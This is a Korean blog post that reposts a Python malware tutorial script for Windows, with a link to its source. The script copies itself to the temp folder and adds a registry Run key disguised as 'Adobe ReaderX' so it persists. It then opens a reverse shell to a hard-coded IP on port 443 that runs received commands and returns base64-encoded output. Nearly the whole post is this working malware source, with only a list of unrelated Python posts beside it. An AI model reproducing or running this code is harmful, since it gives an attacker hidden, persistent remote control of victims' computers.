반응형
출처: http://www.primalsecurity.net/0xc-python-tutorial-python-malware/
import
sys, base64, os, socket, subprocess
from
_winreg
import
*
def
autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
os.system(
'copy %s %s'
%
(fileName, tempdir))
# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
key
=
OpenKey(HKEY_LOCAL_MACHINE, run)
runkey
=
[]
try
:
i
=
0
while
True
:
subkey
=
EnumValue(key, i)
runkey.append(subkey[
0
])
i
+
=
1
except
WindowsError:
pass
# If the autorun key "Adobe ReaderX" isn't set this will set the key:
if
'Adobe ReaderX'
not
in
runkey:
try
:
key
=
OpenKey(HKEY_LOCAL_MACHINE, run,
0
,KEY_ALL_ACCESS)
SetValueEx(key ,
'Adobe_ReaderX'
,
0
,REG_SZ,r
"%TEMP%\mw.exe"
)
key.Close()
except
WindowsError:
pass
def
shell():
#Base64 encoded reverse shell
s
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((
'192.168.56.1'
,
int
(
443
)))
s.send(
'[*] Connection Established!'
)
while
1
:
data
=
s.recv(
1024
)
if
data
=
=
"quit"
:
break
proc
=
subprocess.Popen(data, shell
=
True
, stdout
=
subprocess.PIPE, stderr
=
subprocess.PIPE, stdin
=
subprocess.PIPE)
stdout_value
=
proc.stdout.read()
+
proc.stderr.read()
encoded
=
base64.b64encode(stdout_value)
s.send(encoded)
#s.send(stdout_value)
s.close()
def
main():
tempdir
=
'%TEMP%'
fileName
=
sys.argv[
0
]
run
=
"Software\Microsoft\Windows\CurrentVersion\Run"
autorun(tempdir, fileName, run)
shell()
if
__name__
=
=
"__main__"
:
main()
반응형
'IT기술 관련 > 파이썬_루비 등 언어' 카테고리의 다른 글
Windows pip에서 UnicodeDecodeError 발생 (0) | 2016.04.25 |
---|---|
python pip 설치 (0) | 2016.04.25 |
[Python] Python (*.py)를 exe화 하기 (0) | 2015.12.09 |
[Python] 파이썬2.x Unicode와 UTF-8 인코딩 감잡기 (0) | 2015.11.30 |
[Python] [python]os.path.exists() 파일 존재 체크하기 (0) | 2015.11.30 |